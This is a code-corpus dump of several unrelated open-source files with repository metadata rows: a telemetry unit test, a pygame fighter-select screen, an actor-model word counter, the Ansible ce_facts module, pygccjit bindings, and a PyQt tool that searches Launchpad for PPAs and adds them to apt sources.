from telemetry.results import page_test_results
from telemetry.page import page
from telemetry.web_perf.metrics import layout
from collections import namedtuple
FakeEvent = namedtuple('Event', 'name, start, end')
class LayoutMetricUnitTest(unittest.TestCase):
def testAvgStddev(self):
results = page_test_results.PageTestResults()
results.WillRunPage(page.Page('file://blank.html'))
events = map(FakeEvent._make, [(name, 42, 43) for name in
layout.LayoutMetric.EVENTS])
layout.LayoutMetric()._AddResults(events, results)
expected = set()
for name in layout.LayoutMetric.EVENTS.itervalues():
expected.add((name + '_avg', 1))
expected.add((name + '_stddev', 0))
actual = set((value.name, value.value) for value in
results.current_page_run.values)
self.assertEquals(expected, actual)
| bsd-3-clause | 7,360,149,525,825,876,000 | 36.928571 | 72 | 0.700565 | false |
sylvanelite/universalSmashSystem | menu/css.py | 2 | 12608 | import settingsManager
import spriteManager
import os
import imp
import pygame
import battle
import sys
import stages.true_arena as stage
import engine.cpuPlayer as cpuPlayer
import engine.abstractFighter as abstractFighter
import sss
import musicManager
class CSSScreen():
def __init__(self,_rules=None):
settings = settingsManager.getSetting().setting
self.rules = _rules
self.height = settings['windowHeight']
self.width = settings['windowWidth']
pygame.init()
screen = pygame.display.get_surface()
background = pygame.Surface(screen.get_size())
background = background.convert()
clock = pygame.time.Clock()
self.player_controls = []
self.player_panels = []
for i in range(0,4):
self.player_controls.append(settingsManager.getControls(i))
self.player_panels.append(PlayerPanel(i))
self.player_controls[i].linkObject(self.player_panels[i]) #So playerPanel will take the inputs
self.player_controls[i].flushInputs()
status = 0
musicManager.getMusicManager().stopMusic(100)
while status == 0:
music = musicManager.getMusicManager()
music.doMusicEvent()
if not musicManager.getMusicManager().isPlaying():
musicManager.getMusicManager().rollMusic('css')
#Start event loop
for bindings in self.player_controls:
bindings.passInputs()
for event in pygame.event.get():
for bindings in self.player_controls:
k = bindings.getInputs(event)
if k == 'attack':
if self.checkForSelections():
sss.StageScreen(self.rules,self.getFightersFromPanels())
for panel in self.player_panels:
panel.active_object = panel.wheel
panel.chosen_fighter = None
panel.bg_surface = None
for i in range(0,4):
self.player_controls[i].linkObject(self.player_panels[i]) #So playerPanel will take the inputs
self.player_controls[i].flushInputs()
if event.type == pygame.QUIT:
status = -1
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
status = 1
#End event loop
screen.fill((128, 128, 128))
for panel in self.player_panels:
panel.update()
panel.draw(screen)
pygame.display.flip()
clock.tick(60)
def checkForSelections(self):
for panel in self.player_panels:
if panel.active and panel.chosen_fighter == None:
return False
if not any([x.active for x in self.player_panels]):
return False
return True
def getFightersFromPanels(self):
fighter_list = []
for panel in self.player_panels:
if panel.active:
fighter_list.append(panel.chosen_fighter)
return fighter_list
class CSSWidget():
def __init__(self,_panel,_displayList,_choicesList):
self.previous_widget = None
self.next_widget = None
self.panel = _panel
self.choices = []
for i,key in _displayList:
self.choices.append((key,_choicesList[i]))
def onConfirm(self):
pass
def draw(self):
pass
class FighterWheel():
def __init__(self,_playerNum):
self.fighters = []
# Load all files.
directory = settingsManager.createPath("fighters")
fighter_count = 0
for subdir in next(os.walk(directory))[1]:
if(subdir == '__pycache__'):
continue
fighter_py = settingsManager.importFromURI(directory, os.path.join(directory,subdir,"fighter.py"),_suffix=str(fighter_count))
#try:
if fighter_py:
fighter = fighter_py.getFighter(os.path.join(directory,subdir),_playerNum)
else:
fighter = abstractFighter.AbstractFighter(os.path.join(directory,subdir),_playerNum)
if (fighter == None):
print("No fighter found at " + os.path.join(directory,subdir,"fighter.py"))
else:
fighter_count += 1
self.fighters.append(fighter)
self.current_index = 0
self.current_fighter = self.fighters[0]
self.wheel_size = 9
self.visible_sprites = [None for _ in range(self.wheel_size)]
self.animateWheel()
self.wheel_shadow = spriteManager.ImageSprite(settingsManager.createPath(os.path.join("sprites","cssbar_shadow.png")))
self.fill_color='#000000'
def setFillColor(self,_color):
self.wheel_shadow.recolor(self.wheel_shadow.image,
pygame.Color(self.fill_color),
pygame.Color(_color))
self.fill_color = _color
def changeSelected(self,_increment):
self.current_index = self.current_index + _increment
self.current_fighter = self.fighters[self.current_index % len(self.fighters)]
self.animateWheel()
def fighterAt(self,_offset):
return self.fighters[(self.current_index + _offset) % len(self.fighters)]
def animateWheel(self):
self.visible_sprites[0] = self.fighterAt(0).css_icon
for i in range(1,(self.wheel_size//2)+1):
self.visible_sprites[2*i-1] = self.fighterAt(i).css_icon
self.visible_sprites[2*i] = self.fighterAt(-1 * i).css_icon
[spriteManager.ImageSprite.alpha(sprite, 128) for sprite in self.visible_sprites]
self.visible_sprites[0].alpha(255)
def draw(self, _screen, _location):
center = 112
blank_image = pygame.Surface([256,32], pygame.SRCALPHA, 32).convert_alpha()
blank_image.blit(self.visible_sprites[0].image, [center,0])
for i in range(1,(self.wheel_size//2)+1):
blank_image.blit(self.visible_sprites[2*i-1].image, [center + (32*i),0])
blank_image.blit(self.visible_sprites[2*i].image, [center - (32*i),0])
blank_image.blit(self.wheel_shadow.image,[0,0])
_screen.blit(blank_image, _location)
class PlayerPanel(pygame.Surface):
def __init__(self,_playerNum):
pygame.Surface.__init__(self,(settingsManager.getSetting('windowWidth')//2,
settingsManager.getSetting('windowHeight')//2))
self.keys = settingsManager.getControls(_playerNum)
self.player_num = _playerNum
self.wheel = FighterWheel(_playerNum)
self.active = False
self.ready = False
self.active_object = self.wheel
self.chosen_fighter = None
self.myBots = []
self.wheel_increment = 0
self.hold_time = 0
self.hold_distance = 0
self.wheel_offset = [(self.get_width() - 256) // 2,
(self.get_height() - 32)]
self.bg_surface = None
self.current_color = _playerNum
self.current_costume = 0
self.icon = spriteManager.ImageSprite(settingsManager.createPath('sprites/default_franchise_icon.png'))
self.icon.rect.center = self.get_rect().center
self.icon_color = pygame.Color('#cccccc')
self.fill_color = '#000000'
self.wheel.setFillColor(self.fill_color)
self.recolorIcon()
def update(self):
if self.wheel_increment != 0:
if self.hold_time > self.hold_distance:
if self.hold_distance == 0:
self.hold_distance = 30
elif self.hold_distance == 30:
self.hold_distance = 20
elif self.hold_distance == 20:
self.hold_distance = 10
settingsManager.getSfx().playSound('selectL')
self.wheel.changeSelected(self.wheel_increment)
self.current_color = self.player_num
self.recolorIcon(True)
self.icon = self.wheel.fighterAt(0).franchise_icon
self.icon.rect.center = self.get_rect().center
self.recolorIcon()
self.hold_time = 0
else:
self.hold_time += 1
if self.bg_surface and self.bg_surface.get_alpha() > 128:
self.bg_surface.set_alpha(self.bg_surface.get_alpha() - 10)
def keyPressed(self,_key):
if _key != 'special' and self.active == False:
self.active = True
return
if _key == 'special' and self.active == True:
if len(self.myBots) > 0:
pass #will disable bots
elif self.active_object == self.wheel:
self.active = False
return
else:
self.active_object = self.wheel
self.chosen_fighter = None
self.bg_surface = None
return
#TODO: Add more sound effects and shutter sprite
if _key == 'left':
if self.active_object == self.wheel:
self.wheel_increment = -1
elif _key == 'right':
if self.active_object == self.wheel:
self.wheel_increment = 1
elif _key == 'attack':
if self.active_object == self.wheel:
self.bg_surface = self.copy()
self.bg_surface.set_alpha(240)
self.recolorIcon(True)
self.recolorIcon()
self.active_object = None
self.chosen_fighter = self.wheel.fighterAt(0)
self.chosen_fighter.current_color = self.current_color
self.chosen_fighter.current_costume = self.current_costume
elif _key == 'jump':
self.current_color += 1
self.recolorIcon()
elif _key == 'shield':
self.current_costume += 1
def keyReleased(self,_key):
if _key == 'right' or _key == 'left':
self.wheel_increment = 0
self.hold_distance = 0
self.hold_time = 0
def draw(self,_screen):
if self.active:
self.fill(pygame.Color(self.fill_color))
if self.bg_surface:
self.blit(self.bg_surface,[0,0])
else:
self.wheel.draw(self,self.wheel_offset)
self.icon.draw(self, self.icon.rect.topleft,1.0)
else:
self.fill(pygame.Color(settingsManager.getSetting('playerColor' + str(self.player_num))))
#draw closed shutter
offset = [0,0]
if self.player_num == 1 or self.player_num == 3: offset[0] = self.get_width()
if self.player_num == 2 or self.player_num == 3: offset[1] = self.get_height()
_screen.blit(self,offset)
def recolorIcon(self,_reset=False):
if _reset:
self.icon.recolor(self.icon.image,
self.icon_color,
pygame.Color('#cccccc'))
self.icon_color = pygame.Color('#cccccc')
else:
display_color = self.wheel.fighterAt(0).palette_display
new_color = display_color[self.current_color % len(display_color)]
#If the icon matches the background, make it default to the icon color
if new_color == pygame.Color(self.fill_color):
new_color = pygame.Color('#cccccc')
self.icon.recolor(self.icon.image,
self.icon_color,
new_color)
self.icon_color = new_color | gpl-3.0 | 9,053,441,308,917,273,000 | 38.546624 | 137 | 0.523477 | false |
wolfhesse/exercises-in-programming-style | 28-actors/tf-28.py | 17 | 4126 | #!/usr/bin/env python
import sys, re, operator, string
from threading import Thread
from Queue import Queue
class ActiveWFObject(Thread):
def __init__(self):
Thread.__init__(self)
self.name = str(type(self))
self.queue = Queue()
self._stop = False
self.start()
def run(self):
while not self._stop:
message = self.queue.get()
self._dispatch(message)
if message[0] == 'die':
self._stop = True
def send(receiver, message):
receiver.queue.put(message)
class DataStorageManager(ActiveWFObject):
""" Models the contents of the file """
_data = ''
def _dispatch(self, message):
if message[0] == 'init':
self._init(message[1:])
elif message[0] == 'send_word_freqs':
self._process_words(message[1:])
else:
# forward
send(self._stop_word_manager, message)
def _init(self, message):
path_to_file = message[0]
self._stop_word_manager = message[1]
with open(path_to_file) as f:
self._data = f.read()
pattern = re.compile('[\W_]+')
self._data = pattern.sub(' ', self._data).lower()
def _process_words(self, message):
recipient = message[0]
data_str = ''.join(self._data)
words = data_str.split()
for w in words:
send(self._stop_word_manager, ['filter', w])
send(self._stop_word_manager, ['top25', recipient])
class StopWordManager(ActiveWFObject):
""" Models the stop word filter """
_stop_words = []
def _dispatch(self, message):
if message[0] == 'init':
self._init(message[1:])
elif message[0] == 'filter':
return self._filter(message[1:])
else:
# forward
send(self._word_freqs_manager, message)
def _init(self, message):
with open('../stop_words.txt') as f:
self._stop_words = f.read().split(',')
self._stop_words.extend(list(string.ascii_lowercase))
self._word_freqs_manager = message[0]
def _filter(self, message):
word = message[0]
if word not in self._stop_words:
send(self._word_freqs_manager, ['word', word])
class WordFrequencyManager(ActiveWFObject):
""" Keeps the word frequency data """
_word_freqs = {}
def _dispatch(self, message):
if message[0] == 'word':
self._increment_count(message[1:])
elif message[0] == 'top25':
self._top25(message[1:])
def _increment_count(self, message):
word = message[0]
if word in self._word_freqs:
self._word_freqs[word] += 1
else:
self._word_freqs[word] = 1
def _top25(self, message):
recipient = message[0]
freqs_sorted = sorted(self._word_freqs.iteritems(), key=operator.itemgetter(1), reverse=True)
send(recipient, ['top25', freqs_sorted])
class WordFrequencyController(ActiveWFObject):
def _dispatch(self, message):
if message[0] == 'run':
self._run(message[1:])
elif message[0] == 'top25':
self._display(message[1:])
else:
raise Exception("Message not understood " + message[0])
def _run(self, message):
self._storage_manager = message[0]
send(self._storage_manager, ['send_word_freqs', self])
def _display(self, message):
word_freqs = message[0]
for (w, f) in word_freqs[0:25]:
print w, ' - ', f
send(self._storage_manager, ['die'])
self._stop = True
#
# The main function
#
word_freq_manager = WordFrequencyManager()
stop_word_manager = StopWordManager()
send(stop_word_manager, ['init', word_freq_manager])
storage_manager = DataStorageManager()
send(storage_manager, ['init', sys.argv[1], stop_word_manager])
wfcontroller = WordFrequencyController()
send(wfcontroller, ['run', storage_manager])
# Wait for the active objects to finish
[t.join() for t in [word_freq_manager, stop_word_manager, storage_manager, wfcontroller]]
| mit | 524,502,154,708,970,500 | 29.338235 | 101 | 0.578042 | false |
Dhivyap/ansible | lib/ansible/modules/network/cloudengine/ce_facts.py | 11 | 11503 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ce_facts
version_added: "2.4"
author: "wangdezhuang (@QijunPan)"
short_description: Gets facts about HUAWEI CloudEngine switches.
description:
- Collects facts from CloudEngine devices running the CloudEngine
operating system. Fact collection is supported over Cli
transport. This module prepends all of the base network fact keys
with C(ansible_net_<fact>). The facts module will always collect a
base set of facts from the device and can enable or disable
collection of additional facts.
options:
gather_subset:
description:
- When supplied, this argument will restrict the facts collected
to a given subset. Possible values for this argument include
all, hardware, config, and interfaces. Can specify a
list of values to include a larger subset. Values can also be used
with an initial C(M(!)) to specify that a specific subset should
not be collected.
required: false
default: '!config'
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
- name: CloudEngine facts test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Gather_subset is all"
ce_facts:
gather_subset: all
provider: "{{ cli }}"
- name: "Collect only the config facts"
ce_facts:
gather_subset: config
provider: "{{ cli }}"
- name: "Do not collect hardware facts"
ce_facts:
gather_subset: "!hardware"
provider: "{{ cli }}"
"""
RETURN = """
gather_subset:
description: The list of fact subsets collected from the device
returned: always
type: list
# default
BIOS Version:
description: The BIOS version running on the remote device
returned: always
type: str
Board Type:
description: The board type of the remote device
returned: always
type: str
CPLD1 Version:
description: The CPLD1 Version running the remote device
returned: always
type: str
CPLD2 Version:
description: The CPLD2 Version running the remote device
returned: always
type: str
MAB Version:
description: The MAB Version running the remote device
returned: always
type: str
PCB Version:
description: The PCB Version running the remote device
returned: always
type: str
hostname:
description: The hostname of the remote device
returned: always
type: str
# hardware
FAN:
description: The fan state on the device
returned: when hardware is configured
type: str
PWR:
description: The power state on the device
returned: when hardware is configured
type: str
filesystems:
description: The filesystems on the device
returned: when hardware is configured
type: str
flash_free:
description: The flash free space on the device
returned: when hardware is configured
type: str
flash_total:
description: The flash total space on the device
returned: when hardware is configured
type: str
memory_free:
description: The memory free space on the remote device
returned: when hardware is configured
type: str
memory_total:
description: The memory total space on the remote device
returned: when hardware is configured
type: str
# config
config:
description: The current system configuration on the device
returned: when config is configured
type: str
# interfaces
all_ipv4_addresses:
description: All IPv4 addresses configured on the device
returned: when interfaces is configured
type: list
interfaces:
description: A hash of all interfaces running on the system
returned: when interfaces is configured
type: dict
neighbors:
description: The list of LLDP neighbors from the remote device
returned: when interfaces is configured
type: dict
"""
import re
from ansible.module_utils.network.cloudengine.ce import run_commands
from ansible.module_utils.network.cloudengine.ce import ce_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
class FactsBase(object):
COMMANDS = frozenset()
def __init__(self, module):
self.module = module
self.facts = dict()
self.responses = None
def populate(self):
self.responses = run_commands(self.module, list(self.COMMANDS))
class Default(FactsBase):
""" Class default """
COMMANDS = [
'display version',
'display current-configuration | include sysname'
]
def populate(self):
""" Populate method """
super(Default, self).populate()
data = self.responses[0]
if data:
version = data.split("\n")
for item in version:
if re.findall(r"^\d+\S\s+", item.strip()):
tmp_item = item.split()
tmp_key = tmp_item[1] + " " + tmp_item[2]
if len(tmp_item) > 5:
self.facts[tmp_key] = " ".join(tmp_item[4:])
else:
self.facts[tmp_key] = tmp_item[4]
data = self.responses[1]
if data:
tmp_value = re.findall(r'sysname (.*)', data)
self.facts['hostname'] = tmp_value[0]
class Config(FactsBase):
""" Class config """
COMMANDS = [
'display current-configuration configuration system'
]
def populate(self):
""" Populate method """
super(Config, self).populate()
data = self.responses[0]
if data:
self.facts['config'] = data.split("\n")
class Hardware(FactsBase):
""" Class hardware """
COMMANDS = [
'dir',
'display memory',
'display device'
]
def populate(self):
""" Populate method """
super(Hardware, self).populate()
data = self.responses[0]
if data:
self.facts['filesystems'] = re.findall(r'^Directory of (.*)/', data)[0]
self.facts['flash_total'] = re.findall(r'(.*) total', data)[0].replace(",", "")
self.facts['flash_free'] = re.findall(r'total \((.*) free\)', data)[0].replace(",", "")
data = self.responses[1]
if data:
memory_total = re.findall(r'Total Memory Used: (.*) Kbytes', data)[0]
use_percent = re.findall(r'Memory Using Percentage: (.*)%', data)[0]
memory_free = str(int(memory_total) - int(memory_total) * int(use_percent) / 100)
self.facts['memory_total'] = memory_total + " Kb"
self.facts['memory_free'] = memory_free + " Kb"
data = self.responses[2]
if data:
device_info = data.split("\n")
tmp_device_info = device_info[4:-1]
for item in tmp_device_info:
tmp_item = item.split()
if len(tmp_item) == 8:
self.facts[tmp_item[2]] = tmp_item[6]
elif len(tmp_item) == 7:
self.facts[tmp_item[0]] = tmp_item[5]
class Interfaces(FactsBase):
""" Class interfaces """
COMMANDS = [
'display interface brief',
'display ip interface brief',
'display lldp neighbor brief'
]
def populate(self):
""" Populate method"""
interface_dict = dict()
ipv4_addr_dict = dict()
neighbors_dict = dict()
super(Interfaces, self).populate()
data = self.responses[0]
begin = False
if data:
interface_info = data.split("\n")
for item in interface_info:
if begin:
tmp_item = item.split()
interface_dict[tmp_item[0]] = tmp_item[1]
if re.findall(r"^Interface", item.strip()):
begin = True
self.facts['interfaces'] = interface_dict
data = self.responses[1]
if data:
ipv4_addr = data.split("\n")
tmp_ipv4 = ipv4_addr[11:]
for item in tmp_ipv4:
tmp_item = item.split()
ipv4_addr_dict[tmp_item[0]] = tmp_item[1]
self.facts['all_ipv4_addresses'] = ipv4_addr_dict
data = self.responses[2]
if data:
neighbors = data.split("\n")
tmp_neighbors = neighbors[2:]
for item in tmp_neighbors:
tmp_item = item.split()
if len(tmp_item) > 3:
neighbors_dict[tmp_item[0]] = tmp_item[3]
else:
neighbors_dict[tmp_item[0]] = None
self.facts['neighbors'] = neighbors_dict
FACT_SUBSETS = dict(
default=Default,
hardware=Hardware,
interfaces=Interfaces,
config=Config,
)
VALID_SUBSETS = frozenset(FACT_SUBSETS.keys())
def main():
""" Module main """
spec = dict(
gather_subset=dict(default=['!config'], type='list')
)
spec.update(ce_argument_spec)
module = AnsibleModule(argument_spec=spec, supports_check_mode=True)
warnings = list()
check_args(module, warnings)
gather_subset = module.params['gather_subset']
runable_subsets = set()
exclude_subsets = set()
for subset in gather_subset:
if subset == 'all':
runable_subsets.update(VALID_SUBSETS)
continue
if subset.startswith('!'):
subset = subset[1:]
if subset == 'all':
exclude_subsets.update(VALID_SUBSETS)
continue
exclude = True
else:
exclude = False
if subset not in VALID_SUBSETS:
module.fail_json(msg='Bad subset')
if exclude:
exclude_subsets.add(subset)
else:
runable_subsets.add(subset)
if not runable_subsets:
runable_subsets.update(VALID_SUBSETS)
runable_subsets.difference_update(exclude_subsets)
runable_subsets.add('default')
facts = dict()
facts['gather_subset'] = list(runable_subsets)
instances = list()
for key in runable_subsets:
instances.append(FACT_SUBSETS[key](module))
for inst in instances:
inst.populate()
facts.update(inst.facts)
ansible_facts = dict()
for key, value in iteritems(facts):
# this is to maintain capability with nxos_facts 2.1
if key.startswith('_'):
ansible_facts[key[1:]] = value
else:
ansible_facts[key] = value
module.exit_json(ansible_facts=ansible_facts, warnings=warnings)
if __name__ == '__main__':
main()
| gpl-3.0 | -7,538,972,090,280,520,000 | 26.785024 | 99 | 0.613057 | false |
vickenty/pygccjit | gccjit/__init__.py | 2 | 2299 | # Copyright 2014 Simon Feltman <[email protected]>
# Copyright 2015 David Malcolm <[email protected]>
# Copyright 2015 Red Hat, Inc.
#
# This is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from ._gccjit import (Context,
Object,
Result,
RValue,
LValue,
Type,
Location,
Field,
Struct,
Param,
Function,
Block,
FunctionKind,
UnaryOp,
BinaryOp,
Comparison,
StrOption,
IntOption,
BoolOption,
OutputKind,
TypeKind,
GlobalKind,
Error,
)
# Make it easy to make a "main" function:
def make_main(ctxt):
"""
Make "main" function:
int
main (int argc, char **argv)
{
...
}
Return (func, param_argc, param_argv)
"""
int_type = ctxt.get_type(TypeKind.INT)
param_argc = ctxt.new_param(int_type, b"argc")
char_ptr_ptr_type = (
ctxt.get_type(TypeKind.CHAR).get_pointer().get_pointer())
param_argv = ctxt.new_param(char_ptr_ptr_type, b"argv")
func_main = ctxt.new_function(FunctionKind.EXPORTED,
int_type,
b"main",
[param_argc, param_argv])
return (func_main, param_argc, param_argv)
| gpl-3.0 | 6,381,630,307,275,011,000 | 33.313433 | 71 | 0.510657 | false |
gaining/Resetter | Resetter/usr/lib/resetter/EasyRepo.py | 1 | 12076 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import apt
import lsb_release
import subprocess
import sys
import textwrap
from PyQt5 import QtCore, QtGui
from aptsources import sourceslist
import urllib.request
from bs4 import BeautifulSoup
from AptProgress import UIAcquireProgress
from PackageView import AppView
from Tools import UsefulTools
from PyQt5.QtWidgets import *
class EasyPPAInstall(QDialog):
start_op= QtCore.pyqtSignal(int, bool, str) # Loading progress transmitter
def __init__(self, parent=None):
super(EasyPPAInstall, self).__init__(parent)
self.setWindowTitle("Easy PPA Install")
self.searchEditText = QLineEdit()
self.searchEditText.setPlaceholderText("Search for applications")
self.searchEditText.setMaximumWidth(200)
self.searchbutton = QPushButton()
self.error_msg = QMessageBox()
self.error_msg.setIcon(QMessageBox.Critical)
self.error_msg.setWindowTitle("Error")
self.closebutton = QPushButton()
self.closebutton = QPushButton()
self.closebutton.setText('Close')
self.closebutton.setMaximumWidth(150)
self.closebutton.clicked.connect(self.close)
self.searchbutton.setText("Search")
self.searchbutton.setMaximumWidth(100)
self.progressbar = QProgressBar()
self.lbl1 = QLabel()
self.buttonRefresh = QPushButton()
self.buttonRefresh.setText("Refresh sources")
self.isWrittenTo = False
self.table = QTableWidget()
self.configureTable(self.table)
self.searchbutton.clicked.connect(lambda: self.searchForPPA(self.table))
self.buttonRefresh.clicked.connect(self.updateSources)
self.table.verticalHeader().hide()
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.addWidget(self.searchEditText)
self.horizontalLayout.addWidget(self.searchbutton)
self.horizontalLayout.setAlignment(QtCore.Qt.AlignRight)
self.horizontalLayout2 = QHBoxLayout()
self.horizontalLayout2.setAlignment(QtCore.Qt.AlignRight)
self.horizontalLayout2.addWidget(self.progressbar)
self.horizontalLayout2.addWidget(self.buttonRefresh)
self.horizontalLayout2.addWidget(self.closebutton)
self.verticalLayout = QVBoxLayout(self)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout.addWidget(self.table)
self.verticalLayout.addWidget(self.lbl1)
self.verticalLayout.addLayout(self.horizontalLayout2)
self.os_info = lsb_release.get_distro_information()
self.sources = sourceslist.SourcesList()
self.aprogress = UIAcquireProgress(True)
self.thread1 = QtCore.QThread()
self.aprogress.moveToThread(self.thread1)
self.thread1.started.connect(lambda: self.aprogress.play(0.0, False, ""))
self.aprogress.finished.connect(self.thread1.quit)
self.aprogress.run_op.connect(self.updateProgressBar2)
self.ppa = []
self.table_data = []
@QtCore.pyqtSlot(int, bool, str)
def updateProgressBar2(self, percent, isdone, status):
self.lbl1.setText(status)
self.progressbar.setValue(percent)
if isdone:
self.installProgress.end_of_threads.connect(self.finished)
self.labels[(2, 1)].setPixmap(self.pixmap2)
self.close()
def configureTable(self, table):
table.setColumnCount(4)
table.setHorizontalHeaderItem(0, QTableWidgetItem("Description"))
table.setHorizontalHeaderItem(1, QTableWidgetItem("PPA"))
table.setHorizontalHeaderItem(2, QTableWidgetItem("View Packages within this ppa"))
table.setHorizontalHeaderItem(3, QTableWidgetItem("Add this PPA to your sources"))
table.setMinimumHeight(200)
table.setMinimumWidth(700)
header = table.horizontalHeader()
header.setSectionResizeMode(1, QHeaderView.ResizeToContents)
header.setSectionResizeMode(2, QHeaderView.ResizeToContents)
table.horizontalHeader().setStretchLastSection(True)
def searchForPPA(self, table):
if self.isThereInternet() is False:
self.close()
else:
QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
self.searchbutton.setEnabled(False)
del self.ppa[:]
del self.table_data[:]
search_string = self.searchEditText.text()
page = urllib.request.urlopen('https://launchpad.net/+search?field.text='+search_string)
soup = BeautifulSoup(page, 'html.parser', from_encoding=page.info().get_param('charset'))
found_links = []
match = "+archive"
exclude = ("+packages", "+build", "+sourcepub")
for link in soup.find_all('a', href=True):
real_link = link['href']
if not any(s in real_link for s in exclude) and match in real_link:
found_links.append(real_link)
r = len(found_links)
if r == 0:
self.lbl1.setText("No results found")
else:
self.lbl1.setText("Found {} results".format(r))
table.setRowCount(r)
self.displayLinks(found_links, table)
QApplication.restoreOverrideCursor()
self.searchbutton.setEnabled(True)
def updateSources(self):
self.buttonRefresh.setEnabled(False)
err = False
try:
cache = apt.Cache()
cache.update(self.aprogress)
except Exception as e:
err = True
pass
self.buttonRefresh.setEnabled(True)
if err:
self.lbl1.setText("Update completed but some of your sources are not reachable.")
cache.close()
else:
self.lbl1.setText("Update Complete!")
cache.close()
def displayLinks(self, found_links, table):
loading = 0
x = float(100) / len(found_links) if len(found_links) != 0 else 0
try:
for i, link in enumerate(found_links):
qApp.processEvents()
desc = QTableWidgetItem()
ppa = QTableWidgetItem()
buttonAddPPA = QPushButton()
buttonAddPPA.setText("Install this PPA")
buttonAddPPA.clicked.connect(lambda: self.addPPA(self.ppa))
buttonPackageDetails = QPushButton()
buttonPackageDetails.setText("View packages")
buttonPackageDetails.setEnabled(True)
buttonPackageDetails.clicked.connect(lambda: self.showPackages(self.table_data))
html_text = urllib.request.urlopen(link).read()
soup = BeautifulSoup(html_text, 'html.parser')
ppa.setText(soup.select('strong')[0].text.strip())
desc.setText(textwrap.fill(soup.select('span')[0].text.strip(), 20))
table.setItem(i, 0, desc)
table.setItem(i, 1, ppa)
table.setCellWidget(i, 2, buttonPackageDetails)
table.setCellWidget(i, 3, buttonAddPPA)
repo = soup.find('pre', attrs={'class': 'wrap'})
repo_name = repo.text.strip()
raw = soup.find('code')
raw_key = raw.text.strip()
select_node = soup.findAll('select', attrs={'name': 'field.series_filter'})
self.isCompatible(select_node, repo_name, raw_key)
sauce = soup.find('table', attrs={'class': 'listing sortable'})
self.getTableData(sauce)
loading += x
self.progressbar.setValue(int(loading))
except Exception as e:
QApplication.restoreOverrideCursor()
self.error_msg.setText("Error, please try again.")
self.error_msg.setDetailedText("If this keeps happening, it means easy repo stumbled upon an empty or "
"forbidden link. You might need to change your search string " + str(e))
self.error_msg.exec_()
def isThereInternet(self):
try:
urllib.request.urlopen('http://google.com', timeout=1)
except urllib.request.URLError as e:
print ("There is no internet: {}".format(e))
self.error_msg.setText("You are not connected to the internet")
self.error_msg.setDetailedText("This feature will not work without an internet connection. ")
self.error_msg.exec_()
return False
else:
return True
def codeName(self):
xenial_fam = (['serena', 'sarah', 'loki', 'sonya', 'sylvia'])
bionic_fam = (['tara'])
if self.os_info['CODENAME'] == 'rosa':
return 'trusty'
elif self.os_info['CODENAME'] in xenial_fam:
return 'xenial'
elif self.os_info['CODENAME'] in bionic_fam:
return 'bionic'
else:
return self.os_info['CODENAME']
def isCompatible(self, node, repo, raw):
options = []
compatible = bool
signing_key = str(raw[6:]).split('<', 1)[0]
if node:
for option in node[0].findAll('option'):
option = option.text.strip().lower()
options.append(option)
if self.codeName() in options:
compatible = True
else:
compatible = False
result = (repo, compatible, signing_key)
self.ppa.append(result)
def addPPA(self, ppa):
button = qApp.focusWidget()
index = self.table.indexAt(button.pos())
if index.isValid() and ppa[index.row()][1]:
try:
QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
x = str(ppa[index.row()])
y = str(x[7:]).split(' ', 1)[0]
entry = ('deb', y, self.codeName(), ['main'])
self.sources.add(*entry)
self.sources.save()
p = subprocess.check_output(
['apt-key', 'adv', '--keyserver', 'keyserver.ubuntu.com', '--recv-keys', ppa[index.row()][2]]
)
print(p)
QApplication.restoreOverrideCursor()
except Exception as e:
QApplication.restoreOverrideCursor()
UsefulTools().showMessage("Unable to fetch PPA key", "Error: {}".format(e), QMessageBox.Critical)
else:
UsefulTools().showMessage("PPA added", "This ppa has been successfully added to your sources list",
QMessageBox.Information)
else:
UsefulTools().showMessage("PPA not compatible", "This PPA is not compatible with your system because it's "
"not available for {}".format(self.os_info['DESCRIPTION']),
QMessageBox.Information)
def getTableData(self, sauce):
pasta = []
for i in sauce.select('tr'):
data = i.select('td')
if data:
package = data[0].text.strip()
version = ' '.join(data[1].text.strip().split())
pasta_sauce = "{}: {}".format(package, version)
pasta.append(pasta_sauce)
self.table_data.append(pasta)
def showPackages(self, sauce):
QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
button = qApp.focusWidget()
index = self.table.indexAt(button.pos())
if index.isValid():
available = AppView(self)
text = "These packages are available from the selected ppa"
if len(sauce) >= index.row():
available.showView(sauce[index.row()], "PPA Packages", text, False)
available.show()
QApplication.restoreOverrideCursor()
if __name__ == '__main__':
app = QApplication(sys.argv)
about = EasyPPAInstall()
about.show()
sys.exit(app.exec_())
| gpl-3.0 | 1,778,202,608,526,870,300 | 41.822695 | 119 | 0.596472 | false |
Bismarrck/tensorflow | tensorflow/python/kernel_tests/control_flow_ops_py_test.py | 1 | 151440 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
